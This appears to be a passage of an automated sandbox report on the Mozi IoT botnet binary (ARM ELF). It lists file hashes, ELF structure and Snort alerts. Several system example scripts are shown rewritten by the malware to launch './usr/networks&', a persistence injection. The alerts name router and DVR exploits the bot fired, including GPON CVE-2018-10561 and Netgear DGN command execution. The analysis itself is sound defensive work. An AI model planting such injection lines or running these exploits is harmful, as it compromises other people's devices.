                                                                                                        SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                        SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                        /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):9649
                                                                                                        Entropy (8bit):5.350733164859712
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                        MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                        SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                        SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                        SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                        /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):46
                                                                                                        Entropy (8bit):3.925523369006428
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                        Entropy (8bit):5.819679405566689
                                                                                                        TrID:
                                                                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                        File name:Mozi.m
                                                                                                        File size:307960
                                                                                                        MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                        SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                        SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                        SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                        SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                        File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                        Static ELF Info

                                                                                                        ELF header

                                                                                                        Class:ELF32
                                                                                                        Data:2's complement, little endian
                                                                                                        Version:1 (current)
                                                                                                        Machine:ARM
                                                                                                        Version Number:0x1
                                                                                                        Type:EXEC (Executable file)
                                                                                                        OS/ABI:UNIX - System V
                                                                                                        ABI Version:0
                                                                                                        Entry Point Address:0x8194
                                                                                                        Flags:0x4000002
                                                                                                        ELF Header Size:52
                                                                                                        Program Header Offset:52
                                                                                                        Program Header Size:32
                                                                                                        Number of Program Headers:5
                                                                                                        Section Header Offset:307280
                                                                                                        Section Header Size:40
                                                                                                        Number of Section Headers:17
                                                                                                        Header String Table Index:16

                                                                                                        Sections

                                                                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                        NULL0x00x00x00x00x0000
                                                                                                        .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                        .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                                                        .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                                                        .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                                                        .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                                                        .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                                                        .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                                                        .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                                                        .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                                                        .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                                                        .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                                                        .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                                                        .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                                                        .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                                                        .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                                                        .shstrtabSTRTAB0x00x4afbe0x900x00x0001

                                                                                                        Program Segments

                                                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                        EXIDX0x405800x485800x485800x1280x1280x4R 0x4.ARM.exidx
                                                                                                        LOAD0x00x80000x80000x406a80x406a80x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                        LOAD0x410000x510000x510000x9fa80x2fb380x6RW 0x8000.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
                                                                                                        TLS0x410040x510040x510040x00x80x4R 0x4
                                                                                                        GNU_STACK0x00x00x00x00x00x7RWE0x4

                                                                                                        Network Behavior

                                                                                                        Snort IDS Alerts

                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        01/06/21-14:57:26.185762TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4798280192.168.2.2023.44.146.105
                                                                                                        01/06/21-14:57:26.185762TCP2025883ET EXPLOIT MVPower DVR Shell UCE4798280192.168.2.2023.44.146.105
                                                                                                        01/06/21-14:57:26.486361TCP1200ATTACK-RESPONSES Invalid URL804798223.44.146.105192.168.2.20
                                                                                                        01/06/21-14:57:29.197283ICMP399ICMP Destination Unreachable Host Unreachable131.221.67.202192.168.2.20
                                                                                                        01/06/21-14:57:29.197335ICMP399ICMP Destination Unreachable Host Unreachable131.221.67.202192.168.2.20
                                                                                                        01/06/21-14:57:29.197366ICMP399ICMP Destination Unreachable Host Unreachable131.221.67.202192.168.2.20
                                                                                                        01/06/21-14:57:32.489291ICMP485ICMP Destination Unreachable Communication Administratively Prohibited83.163.237.112192.168.2.20
                                                                                                        01/06/21-14:57:32.518594ICMP449ICMP Time-To-Live Exceeded in Transit62.29.50.34192.168.2.20
                                                                                                        01/06/21-14:57:32.618894ICMP399ICMP Destination Unreachable Host Unreachable173.182.213.7192.168.2.20
                                                                                                        01/06/21-14:57:33.115680ICMP399ICMP Destination Unreachable Host Unreachable58.160.249.135192.168.2.20
                                                                                                        01/06/21-14:57:35.093214ICMP449ICMP Time-To-Live Exceeded in Transit121.134.134.1192.168.2.20
                                                                                                        01/06/21-14:57:35.445319ICMP485ICMP Destination Unreachable Communication Administratively Prohibited46.165.139.60192.168.2.20
                                                                                                        01/06/21-14:57:35.531431ICMP485ICMP Destination Unreachable Communication Administratively Prohibited195.229.0.147192.168.2.20
                                                                                                        01/06/21-14:57:35.576964ICMP485ICMP Destination Unreachable Communication Administratively Prohibited38.104.123.122192.168.2.20
                                                                                                        01/06/21-14:57:35.617698ICMP449ICMP Time-To-Live Exceeded in Transit112.121.132.18192.168.2.20
                                                                                                        01/06/21-14:57:36.448600ICMP485ICMP Destination Unreachable Communication Administratively Prohibited78.54.73.174192.168.2.20
                                                                                                        01/06/21-14:57:36.529036ICMP399ICMP Destination Unreachable Host Unreachable4.31.203.214192.168.2.20
                                                                                                        01/06/21-14:57:36.909575ICMP449ICMP Time-To-Live Exceeded in Transit122.3.241.158192.168.2.20
                                                                                                        01/06/21-14:57:37.586988ICMP399ICMP Destination Unreachable Host Unreachable136.232.125.82192.168.2.20
                                                                                                        01/06/21-14:57:38.492312ICMP399ICMP Destination Unreachable Host Unreachable72.26.212.10192.168.2.20
                                                                                                        01/06/21-14:57:38.579459ICMP399ICMP Destination Unreachable Host Unreachable81.17.34.55192.168.2.20
                                                                                                        01/06/21-14:57:38.598246ICMP485ICMP Destination Unreachable Communication Administratively Prohibited67.187.218.82192.168.2.20
                                                                                                        01/06/21-14:57:38.639817ICMP399ICMP Destination Unreachable Host Unreachable76.125.58.81192.168.2.20
                                                                                                        01/06/21-14:57:38.656070ICMP399ICMP Destination Unreachable Host Unreachable186.200.255.130192.168.2.20
                                                                                                        01/06/21-14:57:39.500793ICMP449ICMP Time-To-Live Exceeded in Transit78.77.181.70192.168.2.20
                                                                                                        01/06/21-14:57:39.607122ICMP399ICMP Destination Unreachable Host Unreachable10.104.240.38192.168.2.20
                                                                                                        01/06/21-14:57:39.626237ICMP449ICMP Time-To-Live Exceeded in Transit173.240.48.5192.168.2.20
                                                                                                        01/06/21-14:57:39.696119ICMP449ICMP Time-To-Live Exceeded in Transit149.11.37.69192.168.2.20
                                                                                                        01/06/21-14:57:39.652838TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5159280192.168.2.2035.168.169.85
                                                                                                        01/06/21-14:57:39.652838TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5159280192.168.2.2035.168.169.85
                                                                                                        01/06/21-14:57:39.698871TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution5443680192.168.2.20107.170.200.206
                                                                                                        01/06/21-14:57:45.647073ICMP402ICMP Destination Unreachable Port Unreachable212.129.33.59192.168.2.20
                                                                                                        01/06/21-14:57:45.928250ICMP402ICMP Destination Unreachable Port Unreachable99.22.6.187192.168.2.20
                                                                                                        01/06/21-14:57:46.789002ICMP449ICMP Time-To-Live Exceeded in Transit114.31.200.89192.168.2.20
                                                                                                        01/06/21-14:57:46.998950ICMP449ICMP Time-To-Live Exceeded in Transit94.140.74.213192.168.2.20
                                                                                                        01/06/21-14:57:48.379250UDP2030919ET TROJAN Mozi Botnet DHT Config Sent329981416559.99.92.197192.168.2.20
                                                                                                        01/06/21-14:57:48.711967UDP2030919ET TROJAN Mozi Botnet DHT Config Sent808014165117.202.68.123192.168.2.20
                                                                                                        01/06/21-14:57:48.786744UDP2030919ET TROJAN Mozi Botnet DHT Config Sent535314165220.77.193.240192.168.2.20
                                                                                                        01/06/21-14:57:50.792341UDP2030919ET TROJAN Mozi Botnet DHT Config Sent1822114165117.215.212.106192.168.2.20
                                                                                                        01/06/21-14:57:53.818731TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)596808080192.168.2.20115.15.161.14
                                                                                                        01/06/21-14:57:53.818731TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)596808080192.168.2.20115.15.161.14
                                                                                                        01/06/21-14:57:56.492941ICMP399ICMP Destination Unreachable Host Unreachable81.92.108.157192.168.2.20
                                                                                                        01/06/21-14:57:56.537634ICMP399ICMP Destination Unreachable Host Unreachable194.30.140.66192.168.2.20
                                                                                                        01/06/21-14:57:56.537677ICMP399ICMP Destination Unreachable Host Unreachable194.30.140.66192.168.2.20
                                                                                                        01/06/21-14:57:56.702928ICMP399ICMP Destination Unreachable Host Unreachable112.189.51.14192.168.2.20
                                                                                                        01/06/21-14:57:59.537589ICMP399ICMP Destination Unreachable Host Unreachable194.30.140.66192.168.2.20
                                                                                                        01/06/21-14:58:00.488374ICMP485ICMP Destination Unreachable Communication Administratively Prohibited77.190.174.8192.168.2.20
                                                                                                        01/06/21-14:58:00.716605ICMP449ICMP Time-To-Live Exceeded in Transit58.159.213.117192.168.2.20
                                                                                                        01/06/21-14:58:01.492971ICMP399ICMP Destination Unreachable Host Unreachable37.134.148.1192.168.2.20
                                                                                                        01/06/21-14:58:03.600643ICMP399ICMP Destination Unreachable Host Unreachable64.201.64.18192.168.2.20
                                                                                                        01/06/21-14:58:03.600692ICMP399ICMP Destination Unreachable Host Unreachable64.201.64.18192.168.2.20
                                                                                                        01/06/21-14:58:03.635948ICMP399ICMP Destination Unreachable Host Unreachable76.167.21.18192.168.2.20
                                                                                                        01/06/21-14:58:03.695835ICMP399ICMP Destination Unreachable Host Unreachable216.129.149.170192.168.2.20
                                                                                                        01/06/21-14:58:03.695877ICMP399ICMP Destination Unreachable Host Unreachable216.129.149.170192.168.2.20
                                                                                                        01/06/21-14:58:03.695909ICMP399ICMP Destination Unreachable Host Unreachable216.129.149.170192.168.2.20
                                                                                                        01/06/21-14:58:06.600512ICMP399ICMP Destination Unreachable Host Unreachable64.201.64.18192.168.2.20
                                                                                                        01/06/21-14:58:07.506230ICMP401ICMP Destination Unreachable Network Unreachable81.228.84.35192.168.2.20
                                                                                                        01/06/21-14:58:07.539832TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5234480192.168.2.20107.154.165.234
                                                                                                        01/06/21-14:58:07.539832TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5234480192.168.2.20107.154.165.234
                                                                                                        01/06/21-14:58:07.609226TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4911680192.168.2.20195.154.172.83
                                                                                                        01/06/21-14:58:07.609226TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4911680192.168.2.20195.154.172.83
                                                                                                        01/06/21-14:58:07.804023TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5978480192.168.2.20158.199.197.56
                                                                                                        01/06/21-14:58:07.804023TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5978480192.168.2.20158.199.197.56
                                                                                                        01/06/21-14:58:10.706145ICMP399ICMP Destination Unreachable Host Unreachable112.190.86.46192.168.2.20
                                                                                                        01/06/21-14:58:21.922021TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4596080192.168.2.20104.97.230.229
                                                                                                        01/06/21-14:58:21.922021TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4596080192.168.2.20104.97.230.229
                                                                                                        01/06/21-14:58:22.290241TCP1200ATTACK-RESPONSES Invalid URL8045960104.97.230.229192.168.2.20
                                                                                                        01/06/21-14:58:22.535928ICMP485ICMP Destination Unreachable Communication Administratively Prohibited80.140.241.117192.168.2.20
                                                                                                        01/06/21-14:58:24.505547ICMP399ICMP Destination Unreachable Host Unreachable92.60.108.50192.168.2.20
                                                                                                        01/06/21-14:58:24.505603ICMP399ICMP Destination Unreachable Host Unreachable92.60.108.50192.168.2.20
                                                                                                        01/06/21-14:58:24.507541ICMP399ICMP Destination Unreachable Host Unreachable85.15.219.250192.168.2.20
                                                                                                        01/06/21-14:58:25.512444ICMP399ICMP Destination Unreachable Host Unreachable80.232.163.10192.168.2.20
                                                                                                        01/06/21-14:58:25.512494ICMP399ICMP Destination Unreachable Host Unreachable80.232.163.10192.168.2.20
                                                                                                        01/06/21-14:58:25.512511ICMP399ICMP Destination Unreachable Host Unreachable80.232.163.10192.168.2.20
                                                                                                        01/06/21-14:58:27.509570ICMP399ICMP Destination Unreachable Host Unreachable92.60.108.50192.168.2.20
                                                                                                        01/06/21-14:58:28.688440TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5240080192.168.2.2066.49.194.21
                                                                                                        01/06/21-14:58:28.688440TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5240080192.168.2.2066.49.194.21
                                                                                                        01/06/21-14:58:31.774382ICMP449ICMP Time-To-Live Exceeded in Transit152.255.144.50192.168.2.20
                                                                                                        01/06/21-14:58:35.786518TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3468480192.168.2.20203.146.142.202
                                                                                                        01/06/21-14:58:35.732667TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)467788080192.168.2.2023.243.117.203
                                                                                                        01/06/21-14:58:35.732667TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)467788080192.168.2.2023.243.117.203
                                                                                                        01/06/21-14:58:35.786518TCP2025883ET EXPLOIT MVPower DVR Shell UCE3468480192.168.2.20203.146.142.202
                                                                                                        01/06/21-14:58:37.968556TCP1201ATTACK-RESPONSES 403 Forbidden8034684203.146.142.202192.168.2.20
                                                                                                        01/06/21-14:58:38.155071TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)3664680192.168.2.20104.238.159.33
                                                                                                        01/06/21-14:58:38.155071TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)3664680192.168.2.20104.238.159.33
                                                                                                        01/06/21-14:58:38.517549ICMP449ICMP Time-To-Live Exceeded in Transit89.206.1.2192.168.2.20
                                                                                                        01/06/21-14:58:40.130831ICMP399ICMP Destination Unreachable Host Unreachable96.110.232.66192.168.2.20
                                                                                                        01/06/21-14:58:41.195477ICMP402ICMP Destination Unreachable Port Unreachable73.112.12.197192.168.2.20
                                                                                                        01/06/21-14:58:41.989791ICMP399ICMP Destination Unreachable Host Unreachable78.244.168.62192.168.2.20
                                                                                                        01/06/21-14:58:41.989828ICMP399ICMP Destination Unreachable Host Unreachable78.244.168.62192.168.2.20
                                                                                                        01/06/21-14:58:41.991395ICMP399ICMP Destination Unreachable Host Unreachable78.244.168.62192.168.2.20
                                                                                                        01/06/21-14:58:42.493771ICMP485ICMP Destination Unreachable Communication Administratively Prohibited46.164.1.124192.168.2.20
                                                                                                        01/06/21-14:58:45.613037ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited185.181.181.25192.168.2.20
                                                                                                        01/06/21-14:58:45.703692ICMP399ICMP Destination Unreachable Host Unreachable187.120.76.2192.168.2.20
                                                                                                        01/06/21-14:58:45.703733ICMP399ICMP Destination Unreachable Host Unreachable187.120.76.2192.168.2.20
                                                                                                        01/06/21-14:58:45.734427ICMP399ICMP Destination Unreachable Host Unreachable211.110.89.170192.168.2.20
                                                                                                        01/06/21-14:58:45.734457ICMP399ICMP Destination Unreachable Host Unreachable211.110.89.170192.168.2.20
                                                                                                        01/06/21-14:58:45.734466ICMP399ICMP Destination Unreachable Host Unreachable211.110.89.170192.168.2.20
                                                                                                        01/06/21-14:58:48.702987ICMP399ICMP Destination Unreachable Host Unreachable187.120.76.2192.168.2.20
                                                                                                        01/06/21-14:58:49.645557ICMP399ICMP Destination Unreachable Host Unreachable199.167.17.231192.168.2.20
                                                                                                        01/06/21-14:58:51.286542ICMP399ICMP Destination Unreachable Host Unreachable192.168.125.38192.168.2.20
                                                                                                        01/06/21-14:58:51.286564ICMP399ICMP Destination Unreachable Host Unreachable192.168.125.38192.168.2.20
                                                                                                        01/06/21-14:58:52.663358TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4836080192.168.2.2054.164.156.191
                                                                                                        01/06/21-14:58:52.747682ICMP399ICMP Destination Unreachable Host Unreachable88.223.136.2192.168.2.20
                                                                                                        01/06/21-14:58:52.747703ICMP399ICMP Destination Unreachable Host Unreachable88.223.136.2192.168.2.20
                                                                                                        01/06/21-14:58:52.747710ICMP399ICMP Destination Unreachable Host Unreachable88.223.136.2192.168.2.20
                                                                                                        01/06/21-14:58:52.663358TCP2025883ET EXPLOIT MVPower DVR Shell UCE4836080192.168.2.2054.164.156.191
                                                                                                        01/06/21-14:58:54.271212ICMP402ICMP Destination Unreachable Port Unreachable178.122.114.84192.168.2.20
                                                                                                        01/06/21-14:58:55.407198ICMP399ICMP Destination Unreachable Host Unreachable72.29.203.65192.168.2.20
                                                                                                        01/06/21-14:58:55.408761ICMP399ICMP Destination Unreachable Host Unreachable72.29.203.65192.168.2.20
                                                                                                        01/06/21-14:58:55.687509TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5006480192.168.2.20107.20.106.251
                                                                                                        01/06/21-14:58:55.687509TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5006480192.168.2.20107.20.106.251
                                                                                                        01/06/21-14:58:56.748679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5299852869192.168.2.20116.206.55.142
                                                                                                        01/06/21-14:58:57.066505ICMP399ICMP Destination Unreachable Host Unreachable97.33.112.9192.168.2.20
                                                                                                        01/06/21-14:58:57.676419ICMP449ICMP Time-To-Live Exceeded in Transit150.185.255.10192.168.2.20
                                                                                                        01/06/21-14:59:00.184618ICMP399ICMP Destination Unreachable Host Unreachable143.90.159.222192.168.2.20
                                                                                                        01/06/21-14:59:03.250766ICMP399ICMP Destination Unreachable Host Unreachable143.90.159.222192.168.2.20
                                                                                                        01/06/21-14:59:03.853110TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)3519680192.168.2.20104.115.250.114
                                                                                                        01/06/21-14:59:03.853110TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)3519680192.168.2.20104.115.250.114
                                                                                                        01/06/21-14:59:04.186294TCP1200ATTACK-RESPONSES Invalid URL8035196104.115.250.114192.168.2.20
                                                                                                        01/06/21-14:59:06.679811ICMP399ICMP Destination Unreachable Host Unreachable189.34.128.26192.168.2.20
                                                                                                        01/06/21-14:59:07.505679ICMP485ICMP Destination Unreachable Communication Administratively Prohibited129.16.2.234192.168.2.20
                                                                                                        01/06/21-14:59:07.851851ICMP399ICMP Destination Unreachable Host Unreachable88.223.136.2192.168.2.20
                                                                                                        01/06/21-14:59:10.520181ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.152.114.5192.168.2.20
